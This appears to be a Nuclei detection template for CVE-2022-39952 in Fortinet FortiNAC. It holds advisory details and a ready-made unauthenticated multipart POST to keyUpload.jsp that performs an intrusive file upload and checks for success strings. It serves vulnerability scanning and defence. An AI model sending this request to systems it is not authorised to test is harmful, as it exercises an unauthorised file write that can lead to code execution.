id: CVE-2022-39952 info: name: Fortinet FortiNAC - Arbitrary File Write author: dwisiswant0 severity: critical description: | Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7. reference: - https://fortiguard.com/psirt/FG-IR-22-300 - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/ - https://github.com/horizon3ai/CVE-2022-39952 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-610 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* epss-score: 0.96793 metadata: max-request: 1 shodan-query: title:"FortiNAC" verified: true tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" http: - method: POST path: - "{{BaseURL}}/configWizard/keyUpload.jsp" headers: Content-Type: "multipart/form-data; boundary={{boundaryId}}" body: | --{{boundaryId}} Content-Disposition: form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip" {{randstr}} --{{boundaryId}}-- matchers-condition: and matchers: - type: word part: body words: - "zipUploadSuccess" - "SuccessfulUpload" condition: and - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by md on 2023/03/22